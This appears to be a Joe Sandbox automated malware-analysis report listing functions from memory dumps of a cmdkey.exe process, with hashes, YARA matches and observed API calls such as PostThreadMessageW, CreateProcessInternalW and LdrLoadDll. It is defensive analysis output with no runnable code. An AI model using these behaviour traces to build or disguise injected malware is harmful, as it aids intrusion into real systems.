                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 879b3c60ef04fd1a234041a3e810e917a4df878d8229c58384b43fb0b8f5fa5e
                                                                                                                                                                                                                                                                • Instruction ID: 8fdc481110b3e8f63c0749aff0a52202e2af0b159d52bcdd3611e5d7da6c01d2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 879b3c60ef04fd1a234041a3e810e917a4df878d8229c58384b43fb0b8f5fa5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC90026130590807D540A5584944607005587D0302F51C415A6158559ECB398C517135
                                                                                                                                                                                                                                                                Function 038F2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e4b7ad4131118354c375f5a6f673697d617f155f8370d7dc2f5dae4f341f80e
                                                                                                                                                                                                                                                                • Instruction ID: 532f25269abb9bfa4eb8cbc4c23888ab8514e74418f5561a5f6432050bb773d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e4b7ad4131118354c375f5a6f673697d617f155f8370d7dc2f5dae4f341f80e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B890026134550846D500A1584554B060055C7E1301F51C419E5158558DC729CC527126
                                                                                                                                                                                                                                                                Function 038F2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 7907066db0fc1cc6086b099c01c69a307d8ab6d2d6749d8372207ba756546206
                                                                                                                                                                                                                                                                • Instruction ID: e6436a493de2c915faffd2a6898a038d0c27bc7f5eb68dc891a9b5a678d387b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7907066db0fc1cc6086b099c01c69a307d8ab6d2d6749d8372207ba756546206
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9590022170550906D501B1584544616005A87D0341F91C426A5118559ECB358992B131
                                                                                                                                                                                                                                                                Function 038F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 230134586756b4bf8a1a9c93e66e206fb538325b0cefe4baf0985442fe521378
                                                                                                                                                                                                                                                                • Instruction ID: 6240afaf857831e0f159de987b1bc981b8a8ff6e5da2f79d7805a61e68704d23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230134586756b4bf8a1a9c93e66e206fb538325b0cefe4baf0985442fe521378
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7990023130550817D511A1584644707005987D0341F91C816A451855CDD7668952B121
                                                                                                                                                                                                                                                                Function 038F2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 16a48eb2958db7aceb33062b3936f6dae86bfb163bc3795a6f823744eaa7a5cc
                                                                                                                                                                                                                                                                • Instruction ID: 5e3ba22c7aaf9fbb4d27208ef15096436f4effea2caef05355c2b3bf5ecace22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16a48eb2958db7aceb33062b3936f6dae86bfb163bc3795a6f823744eaa7a5cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC900221346545565945F1584544507405697E0341791C416A5508954CC6369856E621
                                                                                                                                                                                                                                                                Function 038F2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 8c052bab52b51d75c0cc470f3a3e598d05b82fe2367a6788643989e8fec16eac
                                                                                                                                                                                                                                                                • Instruction ID: 9e001bdad874c9f9dc526d8b83f20457e9f99ead72fa2d5579b7ee1998a6ea54
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c052bab52b51d75c0cc470f3a3e598d05b82fe2367a6788643989e8fec16eac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3890022931750406D580B158554860A005587D1302F91D819A410955CCCA2588696321
                                                                                                                                                                                                                                                                Function 038F2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 240afc75accbcc90d1e915e254b5ab730fe310952ff87c497565a20ddc257b8e
                                                                                                                                                                                                                                                                • Instruction ID: b12ea425e3376d70b940bdaf3492fe691e6039f0bf15db07a690179219d5789f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 240afc75accbcc90d1e915e254b5ab730fe310952ff87c497565a20ddc257b8e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D90022130550407D540B15855586064055D7E1301F51D415E4508558CDA2588566222
                                                                                                                                                                                                                                                                Function 0368F36F Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: MuW
                                                                                                                                                                                                                                                                • API String ID: 0-3612093263
                                                                                                                                                                                                                                                                • Opcode ID: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                                                                                                                                                                                                                                • Instruction ID: 3963b0272833994fb78374312d9c16c703923e95b90a85098aea5931ec195f7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E092B2559BA3CAC706DB5DC155749FF64EF53550729908AC8C34A51AC322454A8BA0
                                                                                                                                                                                                                                                                Function 03010E40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 517 3010e40-3010e41 518 3010e43-3010e45 517->518 519 3010e4e-3010e5e 517->519 520 3010e47 518->520 521 3010e78-3010eca call 302c080 call 3014620 call 3001410 call 3021d70 518->521 520->519 531 3010eea-3010ef0 521->531 532 3010ecc-3010edb PostThreadMessageW 521->532 532->531 533 3010edd-3010ee7 532->533 533->531
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                • Opcode ID: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                                                                                                                                                                                                                                • Instruction ID: 10b1788b849418fb88dea35a1366118030621f3eaee8752bc6e473ec1076be4a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1114C72901248B7DB10DB91AC40DEFF7BCEF44764F098199E948AB100E2364E528BE0
                                                                                                                                                                                                                                                                Function 03010E60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 534 3010e60-3010e7f call 302b670 537 3010e85-3010eca call 3014620 call 3001410 call 3021d70 534->537 538 3010e80 call 302c080 534->538 546 3010eea-3010ef0 537->546 547 3010ecc-3010edb PostThreadMessageW 537->547 538->537 547->546 548 3010edd-3010ee7 547->548 548->546
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                • Opcode ID: ddd99b7262919eb488fde4438dabf92f893d495e18c1a7bb3d1b31d6661d9ecd
                                                                                                                                                                                                                                                                • Instruction ID: 96d33d7e2a0e3d10030051c4423ef6211d97cb4939619ef9c1eea86334dc2d81
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd99b7262919eb488fde4438dabf92f893d495e18c1a7bb3d1b31d6661d9ecd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7801D6B6D4225C7AEB10EAE18C81DEFBBBCDF44694F048164FA046B140D6385E068BB1
                                                                                                                                                                                                                                                                Function 03010DF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44threadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 614 3010df7-3010df9 615 3010e24-3010eca call 3021d70 614->615 616 3010dfb-3010e07 614->616 621 3010eea-3010ef0 615->621 622 3010ecc-3010edb PostThreadMessageW 615->622 616->615 622->621 623 3010edd-3010ee7 622->623 623->621
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                • Opcode ID: 66217e57d7096cb6e5486604ff33468cd83fcdbcea0b566d7a2ee4735ba63ec7
                                                                                                                                                                                                                                                                • Instruction ID: e67efc0ec327f42ed341617a28e404649377018098a7c3396b5859d147d30aa7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66217e57d7096cb6e5486604ff33468cd83fcdbcea0b566d7a2ee4735ba63ec7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF0467290215DB6DF20DAA19C81CEFB7BCEF85354B4880A5E640A7140D2340D428B61
                                                                                                                                                                                                                                                                Function 03010E23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36threadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 624 3010e23-3010eca call 3021d70 628 3010eea-3010ef0 624->628 629 3010ecc-3010edb PostThreadMessageW 624->629 629->628 630 3010edd-3010ee7 629->630 630->628
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                • Opcode ID: f9727a56c7610c9ce31952d5938b489374a348ffb2217f94aab8b87e09cebb1c
                                                                                                                                                                                                                                                                • Instruction ID: 17a96241d3fc7d4bc2d8841f6e0f00f736e31f73b1b250b0153a271e3b7f048d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9727a56c7610c9ce31952d5938b489374a348ffb2217f94aab8b87e09cebb1c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F02E7290114CB6DB10DA81DC81DFFF7BCDF44350B088059E54467140D2340D024BA1
                                                                                                                                                                                                                                                                Function 03023C10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 03023CEB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                • Opcode ID: fefad24d8fdffe2327be90b5f52ac8545aa42dfb4a86ab7b00a701a14cc02c40
                                                                                                                                                                                                                                                                • Instruction ID: 9ea72f95087276c46cd88dfb2a901081886fde4797f6aab9d152c7285393cacf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fefad24d8fdffe2327be90b5f52ac8545aa42dfb4a86ab7b00a701a14cc02c40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8316EB5601309BBD714DFA4D880FEBBBB9EB88710F14455CAA1D6B280D774AA40CBA5
                                                                                                                                                                                                                                                                Function 0301F63A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                                • Opcode ID: d58d3ad3f6c23149d8398a65e5081b5e97961936db7071103d0d8dae40d00cb9
                                                                                                                                                                                                                                                                • Instruction ID: 7684b11722e34738ef3330ad61e0dbb1cd15a513f005576b85cdae80fc944eae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d58d3ad3f6c23149d8398a65e5081b5e97961936db7071103d0d8dae40d00cb9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C312DB6A0060AAFDB10DFD8D8809EFB7B9FF88304B148559E505EB214D775EE45CBA0
                                                                                                                                                                                                                                                                Function 0301F640 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                                • Opcode ID: 61a04c7a9635ba64a24160844dfb5f5275c50d7a62f6ab79a7fd241cc5e09ad4
                                                                                                                                                                                                                                                                • Instruction ID: 70b339635b3fb83226d348f22cf149bb6e0b522e3e83b0ac5c414ca8c076dc16
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61a04c7a9635ba64a24160844dfb5f5275c50d7a62f6ab79a7fd241cc5e09ad4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42312DB6A0020AAFDB10DFD8D8809EFB7B9FF88304B148559E505EB214D775EE05CBA0
                                                                                                                                                                                                                                                                Function 03014620 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014692
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                                                • Instruction ID: cab67f146d1c6ab38c0195dc7fd4ea87022f3f07e5809607c5946ddc0b6ff8a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A011EB9E4120DABEF10DBE5DC41FDDB7B89B54308F044195E9089B250FA71E7588B91
                                                                                                                                                                                                                                                                Function 03029900 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,0301844E,00000010,?,?,?,00000044,?,00000010,0301844E,?,?,?), ref: 03029963
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                                                • Opcode ID: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                                                                                                                                                                                                                • Instruction ID: 8555cf5a3cfd3e33c0412f1aaea6a5c1e2b9228adc6df7c20d3d3e7a80abf9e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5201D6B6205608BBDB44DE99DC81EDB77ADAFCC714F418508BA0DE7240D630F8518BA4
                                                                                                                                                                                                                                                                Function 03009AF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                • Opcode ID: 467a66f041e93a30925ab54a74a94ee60747d33581ac78a1eff4d6a53f05c08d
                                                                                                                                                                                                                                                                • Instruction ID: 51ef44d60d294aefb5ab53b90d8fa14c16fde36a57ed8bec2923702b65886f8f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 467a66f041e93a30925ab54a74a94ee60747d33581ac78a1eff4d6a53f05c08d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0393738131436E220B6E9AC02FDBB69C8B81AA1F140426FB0CEA1C0D995B84183A4
                                                                                                                                                                                                                                                                Function 03009AEC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
